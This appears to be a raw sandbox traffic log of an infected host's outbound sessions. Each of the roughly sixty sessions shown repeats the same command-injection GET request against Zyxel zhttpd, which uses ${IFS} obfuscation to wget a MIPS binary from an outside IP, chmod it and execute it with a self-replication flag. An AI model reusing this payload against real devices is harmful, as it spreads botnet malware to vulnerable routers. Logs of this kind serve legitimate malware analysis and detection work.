                                                        Jan 28, 2024 10:12:51.376256943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3960192.168.2.1443448124.194.18.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376286983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3961192.168.2.143312439.24.117.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376328945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3962192.168.2.1454816218.204.213.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376358986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3963192.168.2.1445406129.142.93.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376399994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3964192.168.2.145197239.216.85.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376431942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3965192.168.2.1437394210.178.96.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376476049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3966192.168.2.1455252166.125.33.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376512051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3967192.168.2.1432998223.197.128.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376557112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3968192.168.2.1442616109.216.113.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376590967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3969192.168.2.144626243.96.110.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376626015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3970192.168.2.1441832212.95.244.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376663923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3971192.168.2.1434296141.80.196.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376694918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3972192.168.2.1448548171.157.222.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376729965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3973192.168.2.1447890112.137.56.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376769066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3974192.168.2.1440120175.156.75.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376806021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3975192.168.2.145118072.2.26.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376836061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3976192.168.2.1448692132.197.179.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376868010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3977192.168.2.146050846.119.22.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376915932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3978192.168.2.144636499.128.140.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376949072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3979192.168.2.145573023.34.107.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376979113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3980192.168.2.144712468.4.224.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377033949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3981192.168.2.143645263.228.244.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377054930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3982192.168.2.144452061.201.96.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377101898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3983192.168.2.145559091.20.68.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377140045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3984192.168.2.1438838165.53.99.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377162933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3985192.168.2.1433102104.43.72.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377224922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3986192.168.2.145233013.186.102.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377262115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3987192.168.2.143772664.211.88.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377322912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3988192.168.2.145215014.31.55.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377356052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3989192.168.2.145470694.100.14.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377391100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3990192.168.2.1457488176.122.84.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377419949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3991192.168.2.145867418.98.109.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377475977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3992192.168.2.1433318213.198.102.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377528906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3993192.168.2.1453448139.228.243.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377551079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3994192.168.2.1441928122.12.39.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377573967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3995192.168.2.1460670194.173.141.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377645969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3996192.168.2.1435628118.190.207.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377655983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3997192.168.2.1451106168.216.46.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377675056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3998192.168.2.144400697.12.211.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377737999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3999192.168.2.1439938200.23.73.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377784967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4000192.168.2.1451654158.64.91.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377821922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4001192.168.2.1444284211.50.61.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377840042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4002192.168.2.1457264222.111.146.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377866030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4003192.168.2.1459074101.153.5.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377912998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4004192.168.2.1450654132.6.156.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377933979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4005192.168.2.1441070155.15.222.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.377957106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4006192.168.2.143906637.132.208.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378010035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4007192.168.2.14425344.77.102.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378051043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4008192.168.2.1455762201.93.9.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378088951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4009192.168.2.143726662.194.17.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378088951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4010192.168.2.1434494148.58.130.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378128052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4011192.168.2.143631875.65.59.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378175974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4012192.168.2.1437534172.208.213.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378201962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4013192.168.2.1442998111.5.89.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378237963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4014192.168.2.146096687.127.209.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378289938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4015192.168.2.1435374114.138.194.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378339052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4016192.168.2.1449848116.254.77.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378369093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4017192.168.2.143427623.195.16.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378416061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4018192.168.2.1442972183.190.144.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378444910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4019192.168.2.1438180134.16.18.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378499985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4020192.168.2.145873439.52.5.55443
                                                        TimestampBytes transferredDirectionData
